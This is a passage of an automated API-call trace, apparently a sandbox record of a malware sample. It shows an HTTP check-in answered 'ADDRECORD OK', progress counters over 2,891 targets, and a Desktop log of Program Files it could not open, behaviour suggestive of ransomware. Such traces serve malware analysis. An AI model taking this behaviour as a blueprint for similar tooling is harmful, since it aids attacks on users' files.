lpWideCharStr="DATE: WED, 03 OCT 2018 03:06:33 GMT") returned 35 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=35, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:06:33 GMT") returned 35 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Type: text/html", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Type: text/html", cchWideChar=23, lpMultiByteStr=0x1fde32c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content-Type: text/html", lpUsedDefaultChar=0x0) returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:06:33 GMT") returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:06:33 GMT") returned 23 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-TYPE: TEXT/HTML", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-TYPE: TEXT/HTML", cchWideChar=23, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTENT-TYPE: TEXT/HTML", lpUsedDefaultChar=0x0) returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:06:33 GMT") returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:06:33 GMT") returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:06:33 GMT") returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:06:33 GMT") returned 23 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=23, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-TYPE: TEXT/HTML03:06:33 GMT") returned 23 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Length: 12", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Length: 12", cchWideChar=18, lpMultiByteStr=0x1fde32c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content-Length: 12", lpUsedDefaultChar=0x0) returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:06:33 GMT") returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:06:33 GMT") returned 18 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-LENGTH: 12", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-LENGTH: 12", cchWideChar=18, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTENT-LENGTH: 12", lpUsedDefaultChar=0x0) returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:06:33 GMT") returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:06:33 GMT") returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:06:33 GMT") returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:06:33 GMT") returned 18 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:06:33 GMT") returned 18 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Connection: keep-alive", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Connection: keep-alive", cchWideChar=22, lpMultiByteStr=0x1fde32c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Connection: keep-alive", lpUsedDefaultChar=0x0) returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-aliveL03:06:33 GMT") returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-aliveL03:06:33 GMT") returned 22 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONNECTION: KEEP-ALIVE", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONNECTION: KEEP-ALIVE", cchWideChar=22, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNECTION: KEEP-ALIVE", lpUsedDefaultChar=0x0) returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:06:33 GMT") returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:06:33 GMT") returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:06:33 GMT") returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:06:33 GMT") returned 22 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:06:33 GMT") returned 22 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-Powered-By: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-Powered-By: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x1fde32c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X-Powered-By: PHP/5.4.16", lpUsedDefaultChar=0x0) returned 24 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:06:33 GMT") returned 24 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde32c, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:06:33 GMT") returned 24 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-POWERED-BY: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0196.063] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-POWERED-BY: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X-POWERED-BY: PHP/5.4.16", lpUsedDefaultChar=0x0) returned 24 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:06:33 GMT") returned 24 [0196.063] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:06:33 GMT") returned 24 [0196.064] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:06:33 GMT") returned 24 [0196.064] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x63ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:06:33 GMT") returned 24 [0196.064] GetCurrentThreadId () returned 0xf98 [0196.064] GetCurrentThreadId () returned 0xf98 [0196.064] GetCurrentThreadId () returned 0xf98 [0196.064] QueryPerformanceFrequency (in: lpFrequency=0x63fca4 | out: lpFrequency=0x63fca4) returned 1 [0196.064] QueryPerformanceCounter (in: lpPerformanceCount=0x63fc9c | out: lpPerformanceCount=0x63fc9c*=24352625097) returned 1 [0196.064] shutdown (s=0x288, how=1) returned 0 [0196.064] Sleep (dwMilliseconds=0x1) [0196.074] ioctlsocket (in: s=0x288, cmd=1074030207, argp=0x63fce8 | out: argp=0x63fce8) returned 0 [0196.074] closesocket (s=0x288) returned 0 [0196.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fba6e0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0196.074] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fba6e0, cbMultiByte=12, lpWideCharStr=0x1fcfdbc, cchWideChar=12 | out: lpWideCharStr="ADDRECORD OK") returned 12 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] SetEvent (hEvent=0x1dc) returned 1 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.074] GetCurrentThreadId () returned 0xf98 [0196.075] GetCurrentThreadId () returned 0xf98 [0196.075] CloseHandle (hObject=0x284) returned 1 [0196.075] RtlExitUserThread (Status=0x0) Thread: id = 100 os_tid = 0xfcc [0196.231] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=0 / B=0 / T=2891", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0196.231] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=0 / B=0 / T=2891", cchWideChar=36, lpMultiByteStr=0x1fe5514, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=0 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 36 [0196.231] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x24, lpOverlapped=0x0) returned 1 [0196.341] Sleep (dwMilliseconds=0x5dc) [0199.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=13 / B=0 / T=2891", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0199.295] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=13 / B=0 / T=2891", cchWideChar=37, lpMultiByteStr=0x1fe5514, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=13 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 37 [0199.295] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x25, lpOverlapped=0x0) returned 1 [0199.804] Sleep (dwMilliseconds=0x5dc) [0201.550] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=82 / B=0 / T=2891", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0201.550] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=82 / B=0 / T=2891", cchWideChar=37, lpMultiByteStr=0x1fe554c, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=82 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 37 [0201.550] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x25, lpOverlapped=0x0) returned 1 [0201.738] Sleep (dwMilliseconds=0x5dc) [0203.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=113 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0203.263] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=113 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe562c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=113 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0203.263] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0203.274] Sleep (dwMilliseconds=0x5dc) [0205.786] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0206.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\n", cchWideChar=690, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 690 [0206.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\n", cchWideChar=690, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 690 [0206.061] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\n", cchWideChar=690, lpMultiByteStr=0x246cad8, cbMultiByte=690, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\no", lpUsedDefaultChar=0x0) returned 690 [0206.062] WriteFile (in: hFile=0x2d0, lpBuffer=0x246cad8*, nNumberOfBytesToWrite=0x2b2, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x246cad8*, lpNumberOfBytesWritten=0x63fe20*=0x2b2, lpOverlapped=0x0) returned 1 [0206.062] CloseHandle (hObject=0x2d0) returned 1 [0206.105] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=135 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0206.105] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=135 / B=0 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe554c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=135 / B=0 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0206.106] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0206.135] Sleep (dwMilliseconds=0x5dc) [0207.834] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2fc [0207.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\n", cchWideChar=3079, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3079 [0207.992] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows 